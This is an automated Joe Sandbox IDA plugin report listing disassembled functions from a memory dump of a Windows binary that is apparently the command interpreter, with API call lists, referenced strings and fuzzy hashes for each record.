                                                                    • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                    • String ID:
                                                                    • API String ID: 1356649289-0
                                                                    • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                    • Instruction ID: 11c14fd628c81399e7e5c5e74ae8080cc37152e268eb0e9d1301f803fb1e397a
                                                                    • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                    • Instruction Fuzzy Hash: A4917132A08B42CBEB14AF11A405579F6B2FB48BA8F845135DA4E43764DF3CD44ACB30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                    • String ID: %s$/-.$:
                                                                    • API String ID: 1644023181-879152773
                                                                    • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                    • Instruction ID: aa15f1a876166277345de3e14c8ff5c378a118f65a19ca32ff5c26dec795e710
                                                                    • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                    • Instruction Fuzzy Hash: 37919362A08F42D5EB10AF14E4411BDE2B2FF44BA8FC44436D65E426D5DE2CE54B8331
                                                                    APIs
                                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF719687251), ref: 00007FF71968628E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSingleWait
                                                                    • String ID: wil
                                                                    • API String ID: 24740636-1589926490
                                                                    • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                    • Instruction ID: 4d9f0d8f905286a1ce03777bcfecb3ecce77dac76c1a5a1d03c6ae8e0daf9a4d
                                                                    • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                    • Instruction Fuzzy Hash: 27413D21A08F42C7E3206F15A401379E6B2EF857A9FA0A171D91A46A94DF3DDC4E8731
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                    • String ID: $Application$System
                                                                    • API String ID: 3377411628-1881496484
                                                                    • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                    • Instruction ID: 2effd69cf8cc785da2a5c84a465007bb56c6865296e4bcfd83f59c78a74be1ee
                                                                    • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                    • Instruction Fuzzy Hash: 42413632B14F429AE720AF60E4403EDB7B6EB89758F845135DA4E42B58EF3CD50AC760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                    • String ID: :$\
                                                                    • API String ID: 3961617410-1166558509
                                                                    • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                    • Instruction ID: d2a7571050d03b652e7e7a425277a05b6f6ad17a4739c163ce8aa6e5e0daf26c
                                                                    • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                    • Instruction Fuzzy Hash: EE218D72A08E42CAE7146F60A544079E6B3FB89BB8BC59131D91F42390EF3CD84F8630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                    • String ID:
                                                                    • API String ID: 1397130798-0
                                                                    • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                    • Instruction ID: 50a8c0007ef13cd8beff3710dfab2b5dc73a6eabbaa483f78566b7ef5de51146
                                                                    • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                    • Instruction Fuzzy Hash: 8C919622A08F8186EB68AF5194506BDF3B2FB44BA8FC48135DA4D07794EF3CD54A9730
                                                                    APIs
                                                                      • Part of subcall function 00007FF7196706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706D6
                                                                      • Part of subcall function 00007FF7196706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706F0
                                                                      • Part of subcall function 00007FF7196706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF71967074D
                                                                      • Part of subcall function 00007FF7196706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF719670762
                                                                    • _wcsicmp.MSVCRT ref: 00007FF7196725CA
                                                                    • _wcsicmp.MSVCRT ref: 00007FF7196725E8
                                                                    • _wcsicmp.MSVCRT ref: 00007FF71967260F
                                                                    • _wcsicmp.MSVCRT ref: 00007FF719672636
                                                                    • _wcsicmp.MSVCRT ref: 00007FF719672650
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$Heap$AllocProcess
                                                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                    • API String ID: 3407644289-1668778490
                                                                    • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                    • Instruction ID: 155eea1199777a238d196db077484fb616d4ff5103444670d9cc9c8ad405a8b8
                                                                    • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                    • Instruction Fuzzy Hash: 0E316E25A08D1286FB197F21E911379E6B6AF94F68F848076D60E462A5DE3CE00EC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                    • String ID: &()[]{}^=;!%'+,`~
                                                                    • API String ID: 2516562204-381716982
                                                                    • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                    • Instruction ID: 1270c04d1e728a90652ba20130a04f9ac76d824d052441198cb881f21615e07a
                                                                    • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                    • Instruction Fuzzy Hash: 06C1C432A14B518AE754AF25E84027EB7B2FB44BA8F941135DE4D03B94DF3CE45AC720
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D46E
                                                                      • Part of subcall function 00007FF71966D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D485
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D4EE
                                                                      • Part of subcall function 00007FF71966D3F0: iswspace.MSVCRT ref: 00007FF71966D54D
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D569
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D58C
                                                                    • iswspace.MSVCRT ref: 00007FF719677EEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                    • String ID: A
                                                                    • API String ID: 3731854180-3554254475
                                                                    • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                    • Instruction ID: aad15e8d59036a8d56a6ce8b55cb3c81ddbc14b7130a44d1cb3087e79d03b2d9
                                                                    • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                    • Instruction Fuzzy Hash: 5BA18E31A09E82C9E624AF11A55127DF6B2FB45BB8F808435CA8D47795EF3CE44AD730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                    • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                    • API String ID: 1580871199-2613899276
                                                                    • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                    • Instruction ID: d8443f626881e5118d4b67198ab8af57634ac7b86c14950d55f5406c4faf8626
                                                                    • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                    • Instruction Fuzzy Hash: DA516D72A18F8286EA109F15A80067DE7B6FB88BA8F845135DE5E07754DF3CD50AC724
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                    • String ID: con
                                                                    • API String ID: 689241570-4257191772
                                                                    • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                    • Instruction ID: 830fbd4665cc4f274040578df39dfec5a242af16c229253a3ac0a59c75acd089
                                                                    • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                    • Instruction Fuzzy Hash: 48418032A08B4586E210AF15944437DFAB2FB49BB8F958334DA2D47790DF3DD94E8760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                    • String ID: PE
                                                                    • API String ID: 2941894976-4258593460
                                                                    • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                    • Instruction ID: a866b12cf67e7cc54c2f91a0dac909f4e94ea40ac6b6525c2cadb6c6dab35bb8
                                                                    • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                    • Instruction Fuzzy Hash: 5F416161A08B41C6E620AF11A51167DF6B2FB89BA4F845134DE5D03B99EF3CE44BCB30
                                                                    APIs
                                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF71968849D,?,?,?,00007FF71968F0C7), ref: 00007FF719670045
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF71968F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF719670071
                                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719670092
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7196700A7
                                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719670148
                                                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF719670181
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                    • String ID:
                                                                    • API String ID: 734197835-0
                                                                    • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                    • Instruction ID: bc19a587d56b093b40aa03db2a65efd2bd81706afdd1e3cb57d6d459043be9f2
                                                                    • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                    • Instruction Fuzzy Hash: AB618676A0CE928AE724AF159804779FAB2BB45B68F844131D94E43790DF3CE54EC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Enum$Openwcsrchr
                                                                    • String ID: %s=%s$.$\Shell\Open\Command
                                                                    • API String ID: 3402383852-1459555574
                                                                    • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                    • Instruction ID: abcf33ea7577fde617aa761d434ddc4629d696b896587ce3660a53bee38d7677
                                                                    • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                    • Instruction Fuzzy Hash: F4A19631A08F42C2EA14AF5590552BAE2B2FF85BA8FD44531DA4D07B84DE7DE94BC330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscmp
                                                                    • String ID: %s
                                                                    • API String ID: 243296809-3043279178
                                                                    • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                    • Instruction ID: dcfc8a8bebf26a42eca3d7ab518dd04de52fc411f5f86fdeb1865d57ddcfa828
                                                                    • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                    • Instruction Fuzzy Hash: 7BA19222709B8696EB69EF21D8407F9A3B2FB4476CF904035CA4D47695DF3CE64AC320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$EnvironmentVariable
                                                                    • String ID: DIRCMD
                                                                    • API String ID: 1405722092-1465291664
                                                                    • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                    • Instruction ID: b39a32bbdd60cf17e76e72dec36f796287f3eaa03e731e64145003a75eb02cac
                                                                    • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                    • Instruction Fuzzy Hash: E1813C72A18BC18AEB20DF60E8902EDB7B6FB4575CF404139DA4D57B58DF38D14A8720
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDA6
                                                                      • Part of subcall function 00007FF71966CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDBD
                                                                    • wcschr.MSVCRT(?,?,?,00007FF7196699DD), ref: 00007FF719669A39
                                                                      • Part of subcall function 00007FF71966DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF71966CEAA), ref: 00007FF71966DFB8
                                                                      • Part of subcall function 00007FF71966DF60: RtlFreeHeap.NTDLL ref: 00007FF71966DFCC
                                                                      • Part of subcall function 00007FF71966DF60: _setjmp.MSVCRT ref: 00007FF71966E03E
                                                                    • wcschr.MSVCRT(?,?,?,00007FF7196699DD), ref: 00007FF719669AF0
                                                                    • wcschr.MSVCRT(?,?,?,00007FF7196699DD), ref: 00007FF719669B0F
                                                                      • Part of subcall function 00007FF7196696E8: memset.MSVCRT ref: 00007FF7196697B2
